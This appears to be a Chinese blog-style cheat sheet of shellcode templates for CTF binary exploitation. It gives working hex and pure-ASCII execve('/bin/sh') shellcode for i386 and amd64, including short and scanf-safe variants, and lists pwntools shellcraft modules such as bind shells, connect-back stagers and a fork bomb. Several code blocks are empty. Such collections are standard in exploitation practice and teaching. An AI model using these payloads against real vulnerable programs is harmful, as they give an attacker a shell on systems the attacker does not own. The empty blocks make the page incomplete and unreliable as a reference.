汇编shell模板
文章发布时间:
最后更新时间:
文章总字数:
预计阅读时间:
页面浏览:加载中...
最后更新时间:
文章总字数:
936
预计阅读时间:
4 分钟
页面浏览:加载中...
最短shellcode
i386长度18
1 |
|
1 |
|
amd64长度22
1 |
|
1 |
|
沙盒下最短shellcode
64位
1 |
|
32位
1 |
|
32位 短字节shellcode –> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA
32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh
64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05
64位 较短的shellcode 23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
其他功能的shell(来自shellcraft)
amd64.linux.amd64_to_i386
- AMD64 到 i386 转换amd64.linux.bindsh
- 绑定式 Shellamd64.linux.cat
- 查看文件内容amd64.linux.cat2
- 查看文件内容(第二版本)amd64.linux.connect
- 连接指定主机和端口amd64.linux.connectstager
- 连接分阶段的指定主机和端口amd64.linux.dupio
- 复制输入/输出amd64.linux.dupsh
- 复制 Shellamd64.linux.echo
- 回显amd64.linux.egghunter
- 查找特定标记的代码(”蛋猎手”)amd64.linux.findpeer
- 查找对等体amd64.linux.findpeersh
- 查找对等体(带 Shell)amd64.linux.findpeerstager
- 查找对等体(分阶段)amd64.linux.forkbomb
- Fork 炸弹amd64.linux.forkexit
- Fork 后退出amd64.linux.getpid
- 获取当前进程 IDamd64.linux.kill
- 终止指定进程amd64.linux.killparent
- 终止父进程amd64.linux.listen
- 监听指定端口amd64.linux.loader
- 加载器amd64.linux.loader_append
- 加载器附加amd64.linux.membot
- 内存机器人amd64.linux.migrate_stack
- 迁移堆栈amd64.linux.mmap_rwx
- 映射内存区域为可读可写可执行amd64.linux.read
- 读取文件内容amd64.linux.read_upto
- 读取文件内容(直到某点)amd64.linux.readfile
- 读取文件amd64.linux.readinto
- 读取到指定位置amd64.linux.readloop
- 循环读取amd64.linux.readn
- 读取指定长度amd64.linux.readptr
- 读取指针amd64.linux.recvsize
- 接收数据并返回大小amd64.linux.setregid
- 设置实际和有效的组 IDamd64.linux.setresuid
- 设置实际、有效和保存的用户 IDamd64.linux.setreuid
- 设置实际和有效的用户 IDamd64.linux.sh
- Shellamd64.linux.socket
- 创建套接字amd64.linux.stage
- 分阶段执行amd64.linux.stager
- 阶段执行amd64.linux.strace_dos
- 使用strace进行拒绝服务攻击amd64.linux.syscall
- 系统调用amd64.linux.writeloop
- 循环写入数据
示例:(未检验arch的沙箱)
1 |
|